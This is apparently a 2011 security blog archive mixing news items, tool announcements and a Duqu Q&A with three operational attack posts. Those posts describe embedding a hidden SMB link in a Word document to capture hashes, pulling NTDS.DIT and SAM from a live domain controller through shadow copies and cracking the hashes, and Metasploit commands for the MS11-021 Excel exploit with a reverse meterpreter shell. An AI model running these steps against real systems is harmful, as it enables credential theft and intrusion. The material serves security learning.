Wednesday, November 30, 2011

Embeding A Link To A Network Share In A Word Doc

Taken from Carnal0wnage blog, this is an excellent method to embed network share in a word document.

snip snip .......

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":

[html][body][img src="\\\share\pwn.jpeg"
width=1 height=1][/body][html]
Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

If this doesnt work for anyone let me know.

Session Hijacking - SSL Session Sidejacking (SSLStrip, Hamster, Ferret)

Mutillidae 2.1.7 Deliberately Vulnerable Web App Updated (a lot)

Jeremy Druin has been doing a lot of work on Mutillidae. Here is the change long since the last time I mentioned it:

Change Log for Mutillidae 2.1.7:

Added a new page for HTML5 storage. The page is meant to show how to both use and attack HTML5 storage. The page supports Local and Session storage types. The user can attack the storage in two contexts. They can act as if they want to read to contents of their own browsers session storage to see if the developer put authorization tokens or other items into the storage. They can also try to use XSS to steal the session storage. In this use-case the user would be acting as if they wanted to read someone elses storage. A large number of hints has been added to the page. The page name is "html5-storage.php" and can be accessed from the Cross Site Scripting menu and information leakage menu. In security level zero, the page has no defenses. In level 1, the page will use trivial JavaScript validation. In security level 5, the page will refuse to put the secrets in client side storage.

11/13/2011: Jeremy Druin / Kenny Kurtz

Change Log for Mutillidae 2.1.6:

Enhanced the .htaccess file to automatically disable magic quotes on systems which enable them by default (such as some OSX versions of PHP)
Fixed some bugs in the phpinfo.php file that made the page display weird.
Enhanced the hidden PHPINFO page so that it would work if the user browsed to http://localhost/mutillidae/index.php?page=phpinfo.php or to http://localhost/mutillidae/phpinfo.php. This example assumes Mutillidae is running on localhost.
Fixed a bug in index.php that kept the log-visit page from being included.
Fixed a bug in log-visit.php that kept the page from working.
Fixed installation instructions format for IE 8 not in compatibility mode.

11/10/2011: Jeremy Druin

Change Log for Mutillidae 2.1.5:

Added vuln to login sequence. Now a cookie is created with username. Students should try to XSS the cookie and see what happens. Also try a response splitting attack because a cookie is an HTTP header.
Created new twitter feed to make Mutillidae announcements and other web vulnerability tweaks. @webpwnized
Fixed installation instructions format for IE 8 not in compatibility mode

10/14/2011: Jeremy Druin

Change Log for Mutillidae 2.1.4:

Moved usage instructions and php errors from the home page to their own pages.
In insecure mode, changed the method of the user-info.php page to GET in order to make it easier to use sqlmap against Mutillidae. sqlmap supports POST but it is easier to use with GET.
Added hints about sqlmap to sql injection tutorial and to the easter egg file
Added a credit card table as a target in the database
Confirmed that the view-blog table can be attacked with sqlmap. The answer is in the Easter Egg file.

10/13/2011: Jeremy Druin

Change Log for Mutillidae 2.1.3:

Fix a bug. If the user was on the home page, without having clicked any link to this point (such as when using a bookmark), then the user clicked the "change security level", the page would redirect to page not found.
Increased the slide time for the ddsmoothmenu to make it slow down a little bit
Added a NEW vulnerability. Many sites have crazy pages that show server settings, expose admin functionality, allow configuration, or other features a user should not be able to see. The problem is not the pages themselves so much as the fact that developers think no one will guess the name and browse to them. Shoulder surfing, guessing, brute-forcing, etc can be used to find these pages. Mutillidae now has such a page. It is in the "Server Misconfiguration" category. See secret-administrative-pages.php for hints.
Augmented the installation instructions
Added link to ihackcharities to front page
Added a new security level. Now there is security level 1. The only difference in this release between level 0 and level 1 is that level 1 has JS validation. The JS validation has been in place for a while to allow but was activated in level 0. Since level 0 is supposed to be very easy, the decision was made to create level 1 and move JS validation to level 1. The JS validation is trivial to bypass. Simply disable JS or use a proxy such as Tamper Data, Paros, Burp, WebScarab, or others.
Page homenotes.php has been merged with home.php.
Page home.html has been renamed home.php
Added protection for SQL injection to add to your blog.php output of the current users blog entries. Prior to this patch, you could SQL inject in security level 5 by putting your injection in the current users login name because the query uses the current users login name as the input to the query.
Improved the DNS lookup page to add JS validation in security level 1 mode.
Changed padding for BACK button to use styles rather than HTML BR tags.
Changed the password generator password length to 15 to set a better example.
Some refactoring on user-info.php and login.php to clean up code
Added CSRF Protection to page add to your blog. This only works in secure mode.
Added more scripts to the easter egg file (Mutillidae Test Scripts)
Bug fix: The setupandreset.php errors were not printing out.
Stupid bug fix: Removed the "open DB" that was firing before the database was actually created.
Created output on page setupandreset.php to show what happened
Added try/catch and more error handling to setupandreset.php

Wednesday, November 23, 2011

Top 10 iPhone Security Tips

This paper offers guidelines on securing your iPhone using features provided by iOS and by following other security best practices.It begins by discussing basic security settings for novice users and then continues to discuss advanced techniques for expert users.This paper is intended for users who want to take proactive measures to secure their iPhones,companies willing to train their employees (before allowing corporate emails on the devices),and administrators working on developing strong policies.It confines its discussion to iPhone security features only and does not discuss similar features that may be available in other mobile device platforms such as Android.However,some of the concepts and standards apply across all these devices.

Download PDF here.

Tuesday, November 22, 2011

Dumping hashes from live DCs...

Lanmaster presented VSSOWN in hackercon and picking up from that rubble, and pushing this technique further to dump hashes off a live DC. Actual blog entry from Pauldotcom is here. It goes like this

The basis of the talk and the purpose for Mark's research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark and my technique with Csaba's tools and here is the result:

1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create

2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

3. Copy files to BT5R1.

2. Download tools from:

3. Configure and Make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make

4. Use esedbdumphash to extract the datatable from ntds.dit.
cd esedbtools
./esedbdumphash ../../ntds.dit

5a. Use to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
cd ../../creddump/
python ./ ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt

6. Crack the hashes.

Beautiful right? But we're not done yet. Csaba also created a tool called which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

python ./ ../system ../libesedb/esedbtools/ntds.dit.export/datatable

So what exactly does this mean? No more dangerous LSSAS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!

Hackers attack a US water utility

Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

It said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment.Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Is it hard to crack full Disk Encryption For Law Enforcement ?

If you'd rather keep your data private, take heart: disk encryption is a lot harder to break than techno-thriller movies and TV shows make it out to be, to the chagrin of some branches of law enforcement. MrSeb writes with word of a paper titled "The growing impact of full disk encryption on digital forensics" that illustrates just how difficult it is. According to the paper, co-authored by a member of US-CERT.

Abstract of Paper is available here, and Short Info written below:
The increasing use of full disk encryption (FDE) can significantly hamper digital investigations, potentially preventing access to all digital evidence in a case. The practice of shutting down an evidential computer is not an acceptable technique when dealing with FDE or even volume encryption because it may result in all data on the device being rendered inaccessible for forensic examination. To address this challenge, there is a pressing need for more effective on-scene capabilities to detect and preserve encryption prior to pulling the plug. In addition, to give digital investigators the best chance of obtaining decrypted data in the field, prosecutors need to prepare search warrants with FDE in mind. This paper describes how FDE has hampered past investigations, and how circumventing FDE has benefited certain cases. This paper goes on to provide guidance for gathering items at the crime scene that may be useful for accessing encrypted data, and for performing on-scene forensic acquisitions of live computer systems. These measures increase the chances of acquiring digital evidence in an unencrypted state or capturing an encryption key or passphrase. Some implications for drafting and executing search warrants to dealing with FDE are discussed.

The paper does go on to suggest some ways to ameliorate these issues, though Better awareness at the evidence-gathering stage would help, but it also suggests “on-scene forensic acquisition” of data, which involves ripping unencrypted data from volatile, live memory with the cryogenic RAM freezing technique, presumably). Ultimately, though, the researchers aren’t hopeful: “Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption,” concludes the paper.

Thursday, November 17, 2011

Hotfix For SRP/AppLocker Bypass

Remember Microsoft has features to bypass its own Software Restriction Policies and AppLocker: Circumventing SRP and AppLocker, By Design and Circumventing SRP and AppLocker to Create a New Process, By Design.

Microsoft has issued a hotfix for this bypass: KB2532445

It is only for Windows 7 and Windows Server 2008 R2 though, it will not help you if you use SRP on Windows XP or Vist

Tuesday, November 15, 2011

Uniscan 2.0 Released

Uniscan is a open source vulnerability scanner for Web applications. Uniscan 2.0 is a perl vulnerability scanner for RFI, LFI, RCE, XSS and SQL-injection. 
  • Identification of system pages through a Web Crawler.
  • Use of threads in the crawler.
  • Control the maximum number of requests the crawler.
  • Control of variation of system pages identified by Web Crawler.
  • Control of file extensions that are ignored.
  • Test of pages found via the GET method.
  • Test the forms found via the POST method.
  • Support for SSL requests (HTTPS).
  • Proxy support.
  • Generate site list using Google.
  • Generate site list using Bing.
  • Plug-in support for Crawler.
  • Plug-in support for dynamic tests.
  • Plug-in support for static tests.
  • Plug-in support for stress tests.

Tutorials to create your plug-ins:

Thursday, November 10, 2011

Metasploit Changes to Git

Metasploit is changing from using their own SVN server to host their repository to GitHub and by this move to Git as their tool for managing the main repository available to the public for getting access to the Framework source code. This also changes the way commits are done, if any none Rapid7 employee or contractor member of the development team wants to contribute code it will have to be thru GitHub pull request feature. This will allow Rapid7 better control over who commits and the quality of the commits making sure that their commercial products Metasploit Community, Pro and Express do not get affected by a contribution that did not go thru a proper test procedure and quality assurance. In addition the shift from SVN to Git will allow greater flexibility to the Rapid7 team to make modification to the the framework on forks and branches on their own systems allowing them to keep the main repository as stable as possible and changes to be pushed in a less risky manner. This is great business move since it will reduce risk and accelerate development of the base foundation of their products, allowing the team to focus more on the technical an engineering aspects of the projects and less on the over heads of managing code on their machines. In terms of management of community commits the pull requests will centralize the process from Redmine and the emails to msfdev mailing list making it easier for them to get contributions for the Framework. I do have to say I will miss the ability to be able to push my own changes and fixes and will have to rely like everybody else to the fork process and GitHub pull request method like everybody else but in the long run this a better solution for the stability of the code, faster innovation and risk reduction allowing Rapid7 to further advanced the Framework that is base of some of their commercial products.

Now this does changes my workflow for the code I write for use in Metasploit. I do have a GitHub account that I used as my temporary account for plugins and modules, I will be consolidating this one in to one single project in GitHub and making sure it follows the folder structure as in the framework so I can just have it in my machine under ~/.msf4 that way I can test modify and test modules and plugins without the need of putting them in the framework folder it self and move them in to the forked version if I wish to contribute them to Rapid7 if not they will still be accessible for sharing under my GitHub page. So there are now 2 new ways to use the framework repository depending on your need, If you are only to consume the code in it and do not wish to contribute your code to Rapid7 you just need to have Git on your system and clone the repository. You first start by installing Git

Installing Git

On OS X you only need to install the latest Xcode Tools from the AppStore On CentOS 6 and latest Fedora Systems you would run as root

yum update

yum install git

On Ubuntu and Debian systems you would run as root

apt-get update

apt-get install git-core

Cloning the Repository

I’m a person who likes having several copies of the Framework to work in, I tend to keep in my home folder on my boxes a folder call dev where I keep all the project repositories I use. So I recommend you start by creating the folder to host the project and its copies if you later decide to fork and work on coding inside the Framework.

mkdir -p ~/dev

cd ~/dev

Once the folder is create you only need to clone the Git repository that is on GitHub

git clone git://

Now you should be able to use and work from inside the metasploit-framework folder created there. To keep you copy updated you only need to run from the folder

git pull

This will fetch the latest changes and merge them together.

Monday, November 7, 2011

Hack3rcon II 2-2 Tim Tomes and Mark Baggett Lurking in the Shadows

This nice talk will discuss the history of concealing data within operating systems and new techniques and tools for doing so in modern Windows implementations.

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway

Vulnerability reported to vendor by ZDI the 2010-10-18

Coordinated release of the vulnerability the 2011-04-12

Metasploit PoC provided the 2011-11-05

PoC provided by :




juan vazquez

Reference(s) :




Affected version(s) :

Microsoft Office XP Service Pack 3

Microsoft Office 2003 Service Pack 3

Microsoft Office 2007 Service Pack 2

Microsoft Office 2010 (32 and 64 bits edition)

Microsoft Office 2004 for Mac

Microsoft Office 2008 for Mac

Microsoft Office for Mac 2011

Open XML File Format Converter for Mac

Microsoft Excel Viewer Service Pack 2

Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp


Thursday, November 3, 2011

Lab Matters - Inside the Sony Hack

Lab Matters - Inside the Sony Hack:

Tim Armstrong looks at the timeline of the Sony breach and pieces together the relevant details at each point in time. He discusses the known facts of the case and the potential future fallout.

13 Out Of 15 Popular CAPTCHA Schemes Vulnerable To Automated Attacks

Security researchers have discovered the vast majority of text-based anti-spam tests are easily defeated.

Computer scientists from Stanford University discovered 13 of 15 CAPTCHA schemes from popular websites were vulnerable to automated attacks. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) has been used for several years to prevent automated sign-ups to webmail accounts or online forums in order to block spam bots. Surfers are typically asked during a registration process to identify distorted letters as depicted in an image. A variety of other approaches – including pictures of cats, audio clips and calculus puzzles – have been applied to the problem over the years.

Cybercrooks have responded to the challenge posed by CAPTCHAs by devising techniques that typically involve semi-automatically signing up for new accounts, while relying on the human cogs in 21st century sweatshops – typically located in India – to solve the CAPTCHA puzzles themselves.

The Stanford team, by contrast, looked at whether it was possible to fully automate the process of breaking CAPTCHAs. Their techniques including removing deliberately introduced image background noise and breaking text strings into single characters for easier recognition. The team built an automated tool, called Decaptcha, that applied these various tricks. The approach was partially inspired by techniques used to orientate robots in unknown environments.

Decaptcha was turned against the challenge response CAPTCHAs used by 15 high-profile websites, enjoying excellent bowling figures against the majority.

For example, Visa’s payment gateway CAPTCHA was defeated 66 per cent of the time. eBay’s CAPTCHA was sidestepped 43 per cent of the time. Lower, but still workable, bypass rates were achieved against Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two CAPTCHA systems that consistently thwarted Decaptcha during the tests. and Digg have both switched to reCAPTCHA since these tests were run, Computerworld adds.

In a research paper (PDF), the Stanford team suggest several approaches towards making CAPTCHAs harder to beat, including making the length of a text string changeable and randomising character font and size. Lines in the background of CAPTCHAs might also prove effective. In addition, the Stanford team highlighted features that are ineffective against automated attacks but may counter the activities of humans.

The researchers, Elie Bursztein, Matthieu Martin and John C Mitchel, who previously developed techniques for breaking audio CAPTCHAs, presented their latest research at the recent ACM Conference On Computer and Communication Security in Chicago.

Duqu: Questions and Answers

Duqu: Questions and Answers: Due to its complexity, case Duqu is challenging to understand. Here are some questions and answers that we hope will help.

Q: What is Duqu?
A: Because of the news and ongoing developments surrounding Duqu, that's actually a very broad question. Here's a narrow answer: Duqu is a Windows bot (not worm) that has been used as part of highly targeted attacks against a limited number of organizations, in a limited number of countries.

Q: How does Duqu spread?
A: Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

Q: Isn't that the same method by which RSA was hacked?
A: Yes. Numerous targeted attacks have used this method. In the RSA case, an Excel document attachment used an embedded Flash object that exploited a zero-day vulnerability in Adobe Flash Player to install a backdoor/remote access tool (RAT) called Poison Ivy.

Q: So what's so special about Duqu's exploit?
A: The zero-day used by Duqu's installer exploits a vulnerability in the Windows kernel.

Q: How much more advanced is a Window kernel exploit than a Flash Player exploit?
A: What? Please.

Q: No, seriously, how much?
A: Significantly more. A Windows kernel vulnerability/exploit is worth a great deal more compared to one used against a third-party application, even one so widely installed as Flash Player.

Q: Can I patch my system against this vulnerability?
A: No. You can't.

Q: So what can I do if this Windows kernel vulnerability is unpatched?
A: Wait. Microsoft Security Response is currently investigating the vulnerability and is preparing a solution. Fortunately, the exploit document is in very limited circulation, and is under an NDA.

Q: Why is there an NDA on the document?
A: Because it was such a highly targeted attack, the document itself would most likely reveal the identity of the target. Sharing the document would be a breach of customer confidentially, and therefore, CrySyS Lab (discoverer of Duqu) cannot release the document unless done in a way that protects the privacy of their customer.

Q: So Duqu's installer is not "in-the-wild"?
A: Not generally, no. Though there could be some other undiscovered variants.

Q: So is Duqu a threat to me?
A: That depends on whom you are. But generally, no. However, Duqu will eventually create a big problem.

Q: What problem will Duqu create?
A: Once Microsoft patches the Windows kernel vulnerability, criminals at large will be able to reverse engineer the patch, and will discover the vulnerability. At that point, any Windows computer that isn't up to date will be more vulnerable to what could prove be to be a very serious exploit.

Q: But not yet?
A: Correct.

Q: Is there anything else interesting about Duqu?
A: Yes, definitely. In one known case, a driver used by Duqu was signed using a stolen certificate issued to a Taiwanese hardware company called C-Media.

Q: Why did Duqu use a signed driver?
A: Signed drivers can circumvent security policies that prompt about or reject installation of unsigned drivers. Security policies can be configured to inherently distrust unsigned drivers. Having a driver signed by a known vendor provides a valuable level of trust.

Q: So then is that why Duqu such a big deal? Because of the zero-day and the signed driver?
A: That… and because Duqu is "related" to Stuxnet.

Q: How is it related?
A: A component of "Duqu" is nearly identical to a component of "Stuxnet" and they appear to have been authored by somebody that has access to common source code.

Q: What else relates "Duqu" and "Stuxnet"?
A: One the drivers used by "Duqu" claims to be from a Taiwanese hardware company called JMicron. Stuxnet used drivers that were signed by a certificate stolen from JMicron.

Q: How were the certificates stolen?
A: Unknown.

Q: How many were stolen?
A: Known cases, three different hardware vendors from Taiwan: C-Media; JMicron; and Realtek.

Q: Why is "Duqu" connected to Taiwan?
A: Unknown.

Q: Why the quotes? What else is "Duqu"?
A: In a broad sense, Duqu is an "organized action" or a "mission" that has been deployed (or authorized) by a nation state.

Q: What do you mean by an "organized action"?
A: "Duqu" appears to be an espionage or reconnaissance mission of some sort. For example, in the real world, a reconnaissance mission of this sort could be considered what United States Marine Corp Force Reconnaissance (FORECON) teams call a "Green Operation".

Q: So "Duqu" isn't just malicious code?
A: The software component is only one part of what we call Duqu. Think about it like this: there's Duqu software and there's also Operation Duqu.

Q: And "Stuxnet"? What about the Stuxnet worm?
A: The installer used by Operation Stuxnet was an advanced USB worm. The worm used a zero-day Windows vulnerability to facilitate its spread.

Q: Are the missions of Operation Duqu and Operation Stuxnet the same?
A: No. Operation Stuxnet was more of a "Black Operation", a mission that involves direct action, which in Stuxnet's case, was to disrupt operations at an Iranian nuclear power facility.

Q: Stuxnet disrupted operations at a nuclear power plant?
A: Yes. Operation Stuxnet was very complex, and also, subtle. The Stuxnet worm and its additional components needed to travel a sizeable distance geographically. It also needed to infiltrate a closed target which was not connected to the Internet, on autopilot, without calling home.

Q: So that's why Stuxnet used a USB worm as the installer/infection vector?
A: Yes. Because of the difficult mitigating factors, Stuxnet needed to spread itself without any external resources. And so it was equipped with numerous zero-day exploits. Out of context, Stuxnet's infection capabilities seem to be overkill, but then, its mission appears to have been a success, so those behind Stuxnet probably don't think so.

Q: How does Duqu differ?
A: Duqu is advanced but is not configured to act autonomously. Once the installer infects its target, Duqu calls home to a command and control (C&C) server. There are two servers that are currently known. One was located in India and the other was located in Belgium. The IP addresses are now inactive.

Q: What actions were carried out by the C&C?
A: In one known case, Duqu downloaded an infostealer to collect data from the target. That infostealer is actually the component from which Duqu gets its name, because it prepends log files related to stolen data with "DQ".

Q: What else can the C&C do?
A: For example, Duqu could be instructed to spread itself on the target network via shared network resources.

Q: How did Duqu send the collected data to the C&C?
A: It encrypted the data and appended it to JPG images.

Q: What? JPG images? Why?
A: So that somebody monitoring network traffic would only see innocent looking image files instead of confidential materials.

Q: Wow. Does Duqu do anything else sneaky?
A: Yes. After 30 days, unless told otherwise by the C&C, Duqu will delete itself limit evidence of the breach.

Q: Who is behind Duqu?
A: Unknown.

Q: What were they looking for, and why?
A: Unknown.

Q: What can you definitively tell us about Duqu?
A: The software components of "Operation Duqu" were made by a very skilled team of developers and exploit analysts.

Q: Can you speculate on Duqu's objectives?
A: Whatever it was, it must be very important to the interests of the nation state actor pulling the strings. It this actor's mind, the cost of disclosing a Windows kernel vulnerability is outweighed by the benefits. Only those with privileged information can accurately determine Duqu's true goals. Unless and until an identifiable direct action results.

Q: So you think a government agency is behind Duqu?
A: Yes.

Q: Should a government actor use malware such as Duqu?
A: It doesn't appear to be up for a vote.

Q: What about Germany's R2D2 trojan?
A: R2D2 is a trojan written for police surveillance. It did not use zero-day exploits and drivers signed with stolen certificates from legitimate hardware vendors. R2D2 was commissioned by German authorities for normal police work.

Q: But police trojans are not good, right?
A: No, malware often finds a way of escaping control. It never seems like a good idea to us.

Q: How bad is R2D2?
A: R2D2 appears to have far overreached what is allowed by German law. It has created a legal and political mess in Germany, but not so much of a technical mess. Our system automation determined R2D2 should not be trusted on its own long before human analysts ever took notice of it. The thing that made R2D2 valuable to the police was its limited install base. It was not really innovative in a way that could be co-opted by criminals.

Q: Are Stuxnet/Duqu innovative?
A: Yes, very much so. Once the vulnerability is disclosed, we (and others) will need to devote numerous man-hours creating strong generic detections for this new exploit. Other members of our Labs will need to datamine our file collections for software signed by C-Media in order to rescan them and process the results. Duqu creates technical headaches and the lessons learned will be adopted by criminals at some point.

Q: What about those that say that Duqu isn't related to Stuxnet?
A: Let's compare the similarities between the two operations.

• The installer exploits zero-day Windows kernel vulnerability(ies).
• Have components signed with a stolen certificates.
• Highly targeted in a way to suggests advanced intelligence.

The technical development team that coded and built the infrastructure for Duqu may differ in part from the team that developed Stuxnet. The highly targeted nature of the attacks suggests a considerable amount of human intelligence work was involved. This intelligence work could have been done by the same or different analysts, but that hardly matters. Whatever the composition of the teams involved, the similarities between the operations would suggest a common nation state actor pulling the strings.

Q: Will we ever learn the identity of this nation state?
A: Doesn't seem likely… at least not anytime soon. The consequences of Duqu's wake discourages any sort of disclosure.

Q: Does this nation state actor have other operations in progress?
A: Unknown. But it wouldn't seem very surprising if so.

Q: Final question (for now): Operation Duqu used an e-mail attachment. Isn't that something that everybody should be on guard against? Why use such a basic attack methodology?
A: Because it works.